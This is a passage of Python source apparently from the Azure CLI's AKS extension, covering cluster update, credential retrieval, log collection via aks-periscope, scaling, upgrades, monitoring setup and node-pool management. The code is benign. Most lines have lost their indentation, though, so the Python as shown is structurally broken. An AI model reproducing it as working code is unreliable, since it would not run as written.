    if not update_autoscaler and \
       not update_acr and \
       not update_lb_profile and \
       not update_pod_security and \
       api_server_authorized_ip_ranges is None:
raise CLIError('Please specify "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--enable-pod-security-policy" or '
'"--disable-pod-security-policy" or '
'"--api-server-authorized-ip-ranges" or '
'"--attach-acr" or '
'"--detach-acr" or '
'"--load-balancer-managed-outbound-ip-count" or '
'"--load-balancer-outbound-ips" or '
'"--load-balancer-outbound-ip-prefixes"')
instance = client.get(resource_group_name, name)
if update_autoscaler and len(instance.agent_pool_profiles) > 1:
raise CLIError('There is more than one node pool in the cluster. Please use "az aks nodepool" command '
'to update per node pool auto scaler settings')
node_count = instance.agent_pool_profiles[0].count
if min_count is None or max_count is None:
if enable_cluster_autoscaler or update_cluster_autoscaler:
            raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
                           '--update-cluster-autoscaler is set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError('value of min-count should be less than or equal to value of max-count.')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError("current node count '{}' is not in the range of min-count and max-count.".format(node_count))
if enable_cluster_autoscaler:
if instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already enabled for this managed cluster.\n'
'Please run "az aks update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
instance.agent_pool_profiles[0].enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
raise CLIError('Cluster autoscaler is not enabled for this managed cluster.\n'
'Run "az aks update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already disabled for this managed cluster.')
return None
instance.agent_pool_profiles[0].enable_auto_scaling = False
instance.agent_pool_profiles[0].min_count = None
instance.agent_pool_profiles[0].max_count = None
if enable_pod_security_policy and disable_pod_security_policy:
raise CLIError('Cannot specify --enable-pod-security-policy and --disable-pod-security-policy '
'at the same time.')
if enable_pod_security_policy:
instance.enable_pod_security_policy = True
if disable_pod_security_policy:
instance.enable_pod_security_policy = False
load_balancer_profile = _get_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes)
if load_balancer_profile:
instance.network_profile.load_balancer_profile = load_balancer_profile
if attach_acr and detach_acr:
raise CLIError('Cannot specify "--attach-acr" and "--detach-acr" at the same time.')
subscription_id = get_subscription_id(cmd.cli_ctx)
client_id = instance.service_principal_profile.client_id
if not client_id:
raise CLIError('Cannot get the AKS cluster\'s service principal.')
if attach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if detach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=detach_acr,
subscription_id=subscription_id,
detach=True)
# empty string is valid as it disables ip whitelisting
if api_server_authorized_ip_ranges is not None:
instance.api_server_access_profile = \
_populate_api_server_access_profile(api_server_authorized_ip_ranges, instance)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_show(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def aks_get_credentials(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
admin=False,
user='clusterUser',
path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
overwrite_existing=False):
credentialResults = None
if admin:
credentialResults = client.list_cluster_admin_credentials(resource_group_name, name)
else:
if user.lower() == 'clusteruser':
credentialResults = client.list_cluster_user_credentials(resource_group_name, name)
elif user.lower() == 'clustermonitoringuser':
credentialResults = client.list_cluster_monitoring_user_credentials(resource_group_name, name)
else:
raise CLIError("The user is invalid.")
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(encoding='UTF-8')
_print_or_merge_credentials(path, kubeconfig, overwrite_existing)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
ADDONS = {
'http_application_routing': 'httpApplicationRouting',
'monitoring': 'omsagent',
'virtual-node': 'aciConnector',
'azure-policy': 'azurepolicy',
'kube-dashboard': 'kubeDashboard'
}
# pylint: disable=line-too-long
def aks_kollect(cmd, # pylint: disable=too-many-statements,too-many-locals
client,
resource_group_name,
name,
storage_account=None,
sas_token=None,
container_logs=None,
kube_objects=None,
node_logs=None):
colorama.init()
mc = client.get(resource_group_name, name)
if not which('kubectl'):
        raise CLIError('Cannot find kubectl executable in PATH')
storage_account_id = None
if storage_account is None:
print("No storage account specified. Try getting storage account from diagnostic settings")
storage_account_id = get_storage_account_from_diag_settings(cmd.cli_ctx, resource_group_name, name)
if storage_account_id is None:
raise CLIError("A storage account must be specified, since there isn't one in the diagnostic settings.")
from msrestazure.tools import is_valid_resource_id, parse_resource_id, resource_id
if storage_account_id is None:
if not is_valid_resource_id(storage_account):
storage_account_id = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Storage', type='storageAccounts',
name=storage_account
)
else:
storage_account_id = storage_account
if is_valid_resource_id(storage_account_id):
try:
parsed_storage_account = parse_resource_id(storage_account_id)
except CloudError as ex:
raise CLIError(ex.message)
else:
raise CLIError("Invalid storage account id %s" % storage_account_id)
storage_account_name = parsed_storage_account['name']
readonly_sas_token = None
if sas_token is None:
storage_client = cf_storage(cmd.cli_ctx, parsed_storage_account['subscription'])
storage_account_keys = storage_client.storage_accounts.list_keys(parsed_storage_account['resource_group'],
storage_account_name)
kwargs = {
'account_name': storage_account_name,
'account_key': storage_account_keys.keys[0].value
}
cloud_storage_client = cloud_storage_account_service_factory(cmd.cli_ctx, kwargs)
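        # Generate two account-level SAS tokens valid for one day: a full-access token
        # ('rwdlacup') that the periscope pods use to upload logs, and a read/list-only
        # token ('rl') embedded in the storage URL printed at the end of this command.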
sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rwdlacup',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rl',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = readonly_sas_token.strip('?')
from knack.prompting import prompt_y_n
print()
print('This will deploy a daemon set to your cluster to collect logs and diagnostic information and '
f'save them to the storage account '
f'{colorama.Style.BRIGHT}{colorama.Fore.GREEN}{storage_account_name}{colorama.Style.RESET_ALL} as '
f'outlined in {format_hyperlink("http://aka.ms/AKSPeriscope")}.')
print()
    print('If you share access to that storage account with Azure support, you consent to the terms outlined'
          f' in {format_hyperlink("http://aka.ms/DiagConsent")}.')
print()
if not prompt_y_n('Do you confirm?', default="n"):
return
print()
print("Getting credentials for cluster %s " % name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=True, path=temp_kubeconfig_path)
print()
print("Starts collecting diag info for cluster %s " % name)
sas_token = sas_token.strip('?')
deployment_yaml = urlopen(
"https://raw.githubusercontent.com/Azure/aks-periscope/v0.2/deployment/aks-periscope.yaml").read().decode()
deployment_yaml = deployment_yaml.replace("# <accountName, base64 encoded>",
(base64.b64encode(bytes(storage_account_name, 'ascii'))).decode('ascii'))
deployment_yaml = deployment_yaml.replace("# <saskey, base64 encoded>",
(base64.b64encode(bytes("?" + sas_token, 'ascii'))).decode('ascii'))
yaml_lines = deployment_yaml.splitlines()
for index, line in enumerate(yaml_lines):
if "DIAGNOSTIC_CONTAINERLOGS_LIST" in line and container_logs is not None:
yaml_lines[index] = line + ' ' + container_logs
if "DIAGNOSTIC_KUBEOBJECTS_LIST" in line and kube_objects is not None:
yaml_lines[index] = line + ' ' + kube_objects
if "DIAGNOSTIC_NODELOGS_LIST" in line and node_logs is not None:
yaml_lines[index] = line + ' ' + node_logs
deployment_yaml = '\n'.join(yaml_lines)
fd, temp_yaml_path = tempfile.mkstemp()
temp_yaml_file = os.fdopen(fd, 'w+t')
try:
temp_yaml_file.write(deployment_yaml)
temp_yaml_file.flush()
temp_yaml_file.close()
try:
print()
print("Cleaning up aks-periscope resources if existing")
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"serviceaccount,configmap,daemonset,secret",
"--all", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding-view", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRole",
"aks-periscope-role", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"--all",
"apd", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.DEVNULL)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"CustomResourceDefinition",
"diagnostics.aks-periscope.azure.github.com", "--ignore-not-found"],
stderr=subprocess.STDOUT)
print()
print("Deploying aks-periscope")
subprocess.check_output(["kubectl", "--kubeconfig", temp_kubeconfig_path, "apply", "-f",
temp_yaml_path, "-n", "aks-periscope"], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
finally:
os.remove(temp_yaml_path)
print()
normalized_fqdn = mc.fqdn.replace('.', '-')
token_in_storage_account_url = readonly_sas_token if readonly_sas_token is not None else sas_token
log_storage_account_url = f"https://{storage_account_name}.blob.core.windows.net/" \
f"{normalized_fqdn}?{token_in_storage_account_url}"
print(f'{colorama.Fore.GREEN}Your logs are being uploaded to storage account {format_bright(storage_account_name)}')
print()
    print(f'You can download Azure Storage Explorer here '
f'{format_hyperlink("https://azure.microsoft.com/en-us/features/storage-explorer/")}'
f' to check the logs by adding the storage account using the following URL:')
print(f'{format_hyperlink(log_storage_account_url)}')
print()
if not prompt_y_n('Do you want to see analysis results now?', default="n"):
print(f"You can run 'az aks kanalyze -g {resource_group_name} -n {name}' "
f"anytime to check the analysis results.")
return
else:
display_diagnostics_report(temp_kubeconfig_path)
return
def aks_kanalyze(cmd, client, resource_group_name, name):
colorama.init()
client.get(resource_group_name, name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=True, path=temp_kubeconfig_path)
display_diagnostics_report(temp_kubeconfig_path)
def aks_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
node_count,
nodepool_name="",
no_wait=False):
instance = client.get(resource_group_name, name)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
        raise CLIError('There is more than one node pool in the cluster. '
                       'Please specify the node pool name or use the "az aks nodepool" command to scale a node pool')
if node_count == 0:
raise CLIError("Can't scale down to 0 nodes.")
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
def aks_upgrade(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
kubernetes_version,
control_plane_only=False,
no_wait=False,
**kwargs): # pylint: disable=unused-argument
instance = client.get(resource_group_name, name)
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
from knack.prompting import prompt_y_n
upgrade_all = False
instance.kubernetes_version = kubernetes_version
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def _handle_addons_args(cmd, addons_str, subscription_id, resource_group_name, addon_profiles=None,
workspace_resource_id=None):
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles['httpApplicationRouting'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('http_application_routing')
if 'kube-dashboard' in addons:
addon_profiles['kubeDashboard'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profiles['omsagent'] = ManagedClusterAddonProfile(
enabled=True, config={'logAnalyticsWorkspaceResourceID': workspace_resource_id})
addons.remove('monitoring')
# error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is
elif workspace_resource_id:
raise CLIError('"--workspace-resource-id" requires "--enable-addons monitoring".')
if 'azure-policy' in addons:
addon_profiles['azurepolicy'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('azure-policy')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name):
# mapping for azure public cloud
# log analytics workspaces cannot be created in WCUS region due to capacity limits
# so mapped to EUS per discussion with log analytics team
AzureCloudLocationToOmsRegionCodeMap = {
"australiasoutheast": "ASE",
"australiaeast": "EAU",
"australiacentral": "CAU",
"canadacentral": "CCA",
"centralindia": "CIN",
"centralus": "CUS",
"eastasia": "EA",
"eastus": "EUS",
"eastus2": "EUS2",
"eastus2euap": "EAP",
"francecentral": "PAR",
"japaneast": "EJP",
"koreacentral": "SE",
"northeurope": "NEU",
"southcentralus": "SCUS",
"southeastasia": "SEA",
"uksouth": "SUK",
"usgovvirginia": "USGV",
"westcentralus": "EUS",
"westeurope": "WEU",
"westus": "WUS",
"westus2": "WUS2"
}
AzureCloudRegionToOmsRegionMap = {
"australiacentral": "australiacentral",
"australiacentral2": "australiacentral",
"australiaeast": "australiaeast",
"australiasoutheast": "australiasoutheast",
"brazilsouth": "southcentralus",
"canadacentral": "canadacentral",
"canadaeast": "canadacentral",
"centralus": "centralus",
"centralindia": "centralindia",
"eastasia": "eastasia",
"eastus": "eastus",
"eastus2": "eastus2",
"francecentral": "francecentral",
"francesouth": "francecentral",
"japaneast": "japaneast",
"japanwest": "japaneast",
"koreacentral": "koreacentral",
"koreasouth": "koreacentral",
"northcentralus": "eastus",
"northeurope": "northeurope",
"southafricanorth": "westeurope",
"southafricawest": "westeurope",
"southcentralus": "southcentralus",
"southeastasia": "southeastasia",
"southindia": "centralindia",
"uksouth": "uksouth",
"ukwest": "uksouth",
"westcentralus": "eastus",
"westeurope": "westeurope",
"westindia": "centralindia",
"westus": "westus",
"westus2": "westus2"
}
# mapping for azure china cloud
# log analytics only support China East2 region
AzureChinaLocationToOmsRegionCodeMap = {
"chinaeast": "EAST2",
"chinaeast2": "EAST2",
"chinanorth": "EAST2",
"chinanorth2": "EAST2"
}
AzureChinaRegionToOmsRegionMap = {
"chinaeast": "chinaeast2",
"chinaeast2": "chinaeast2",
"chinanorth": "chinaeast2",
"chinanorth2": "chinaeast2"
}
    # mapping for azure us government cloud
AzureFairfaxLocationToOmsRegionCodeMap = {
"usgovvirginia": "USGV"
}
AzureFairfaxRegionToOmsRegionMap = {
"usgovvirginia": "usgovvirginia"
}
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
cloud_name = cmd.cli_ctx.cloud.name
if cloud_name.lower() == 'azurecloud':
workspace_region = AzureCloudRegionToOmsRegionMap.get(rg_location, "eastus")
workspace_region_code = AzureCloudLocationToOmsRegionCodeMap.get(workspace_region, "EUS")
elif cloud_name.lower() == 'azurechinacloud':
workspace_region = AzureChinaRegionToOmsRegionMap.get(rg_location, "chinaeast2")
workspace_region_code = AzureChinaLocationToOmsRegionCodeMap.get(workspace_region, "EAST2")
elif cloud_name.lower() == 'azureusgovernment':
workspace_region = AzureFairfaxRegionToOmsRegionMap.get(rg_location, "usgovvirginia")
workspace_region_code = AzureFairfaxLocationToOmsRegionCodeMap.get(workspace_region, "USGV")
else:
logger.error("AKS Monitoring addon not supported in cloud : %s", cloud_name)
default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code
default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(subscription_id, workspace_region_code)
default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \
'/workspaces/{2}'.format(subscription_id, default_workspace_resource_group, default_workspace_name)
resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id)
resources = cf_resources(cmd.cli_ctx, subscription_id)
# check if default RG exists
if resource_groups.check_existence(default_workspace_resource_group):
try:
resource = resources.get_by_id(default_workspace_resource_id, '2015-11-01-preview')
return resource.id
except CloudError as ex:
if ex.status_code != 404:
raise ex
else:
resource_groups.create_or_update(default_workspace_resource_group, {'location': workspace_region})
default_workspace_params = {
'location': workspace_region,
'properties': {
'sku': {
'name': 'standalone'
}
}
}
async_poller = resources.create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview',
default_workspace_params)
ws_resource_id = ''
while True:
result = async_poller.result(15)
if async_poller.done():
ws_resource_id = result.id
break
return ws_resource_id
def _ensure_container_insights_for_monitoring(cmd, addon):
# workaround for this addon key which has been seen lowercased in the wild
if 'loganalyticsworkspaceresourceid' in addon.config:
addon.config['logAnalyticsWorkspaceResourceID'] = addon.config.pop('loganalyticsworkspaceresourceid')
workspace_resource_id = addon.config['logAnalyticsWorkspaceResourceID'].strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
# extract subscription ID and resource group from workspace_resource_id URL
try:
subscription_id = workspace_resource_id.split('/')[2]
resource_group = workspace_resource_id.split('/')[4]
except IndexError:
raise CLIError('Could not locate resource group in workspace-resource-id URL.')
# region of workspace can be different from region of RG so find the location of the workspace_resource_id
resources = cf_resources(cmd.cli_ctx, subscription_id)
try:
resource = resources.get_by_id(workspace_resource_id, '2015-11-01-preview')
location = resource.location
except CloudError as ex:
raise ex
unix_time_in_millis = int(
(datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
solution_deployment_name = 'ContainerInsights-{}'.format(unix_time_in_millis)
# pylint: disable=line-too-long
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workspaceResourceId": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics Resource ID"
}
},
"workspaceRegion": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics workspace region"
}
},
"solutionDeploymentName": {
"type": "string",
"metadata": {
"description": "Name of the solution deployment"
}
}
},
"resources": [
{
"type": "Microsoft.Resources/deployments",
"name": "[parameters('solutionDeploymentName')]",
"apiVersion": "2017-05-10",
"subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
"resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
"properties": {
"mode": "Incremental",
"template": {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {},
"variables": {},
"resources": [
{
"apiVersion": "2015-11-01-preview",
"type": "Microsoft.OperationsManagement/solutions",
"location": "[parameters('workspaceRegion')]",
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"properties": {
"workspaceResourceId": "[parameters('workspaceResourceId')]"
},
"plan": {
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"product": "[Concat('OMSGallery/', 'ContainerInsights')]",
"promotionCode": "",
"publisher": "Microsoft"
}
}
]
},
"parameters": {}
}
}
]
}
params = {
"workspaceResourceId": {
"value": workspace_resource_id
},
"workspaceRegion": {
"value": location
},
"solutionDeploymentName": {
"value": solution_deployment_name
}
}
deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
# publish the Container Insights solution to the Log Analytics workspace
return _invoke_deployment(cmd.cli_ctx, resource_group, deployment_name, template, params,
validate=False, no_wait=False, subscription_id=subscription_id)
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
file_name_aks = 'aksServicePrincipal.json'
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, try to load it from local disk
principal_obj = load_acs_service_principal(subscription_id, file_name=file_name_aks)
if principal_obj:
service_principal = principal_obj.get('service_principal')
client_secret = principal_obj.get('client_secret')
else:
# Nothing to load, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'http://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
service_principal = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
        # --service-principal specified, validate --client-secret was too
if not client_secret:
raise CLIError('--client-secret is required if --service-principal is specified')
store_acs_service_principal(subscription_id, client_secret, service_principal, file_name=file_name_aks)
return load_acs_service_principal(subscription_id, file_name=file_name_aks)
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
groups = cf_resource_groups(ctx, subscription_id=subscription_id)
# Just do the get, we don't need the result, it will error out if the group doesn't exist.
rg = groups.get(resource_group_name)
return rg.location
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
            raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler is enabled')
if int(min_count) > int(max_count):
raise CLIError('value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError('node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
            raise CLIError('min-count and max-count can only be used together with --enable-cluster-autoscaler')
def _create_client_secret():
    # Add a special character to satisfy AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _ensure_aks_acr(cli_ctx,
client_id,
acr_name_or_id,
subscription_id, # pylint: disable=unused-argument
detach=False):
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
    # Check if the ACR exists by name across all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError("ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
def _ensure_aks_acr_role_assignment(cli_ctx,
client_id,
registry_id,
detach=False):
if detach:
if not _delete_role_assignments(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not _add_role_assignment(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
def aks_agentpool_show(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name):
return client.list(resource_group_name, cluster_name)
def aks_agentpool_add(cmd, # pylint: disable=unused-argument,too-many-locals
client,
resource_group_name,
cluster_name,
nodepool_name,
kubernetes_version=None,
node_zones=None,
node_vm_size=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
max_pods=0,
os_type="Linux",
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
node_taints=None,
priority="Regular",
eviction_policy="Delete",
public_ip_per_vm=False,
no_wait=False):
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
raise CLIError("Node pool {} already exists, please try a different name, "
"use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
taints_array = []
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise CLIError('Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
if priority is not None and priority == "Low":
from knack.prompting import prompt_y_n
msg = 'Cluster Autoscaler is currently required for low-pri, enable it?'
if not prompt_y_n(msg, default="n"):
return None
enable_cluster_autoscaler = True
if min_count is None:
min_count = node_count
if max_count is None:
max_count = node_count
# add low pri taint if not already specified
low_pri_taint = "pooltype=lowpri:NoSchedule"
if low_pri_taint not in taints_array:
taints_array.append("pooltype=lowpri:NoSchedule")
if node_vm_size is None:
if os_type == "Windows":
node_vm_size = "Standard_D2s_v3"
else:
node_vm_size = "Standard_DS2_v2"
agent_pool = AgentPool(
name=nodepool_name,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=node_zones,
node_taints=taints_array,
scale_set_priority=priority,
scale_set_eviction_policy=eviction_policy,
enable_node_public_ip=public_ip_per_vm
)
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool)
def aks_agentpool_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if new_node_count == 0:
raise CLIError("Can't scale down to 0 nodes.")
if new_node_count == instance.count:
raise CLIError("The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_upgrade(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
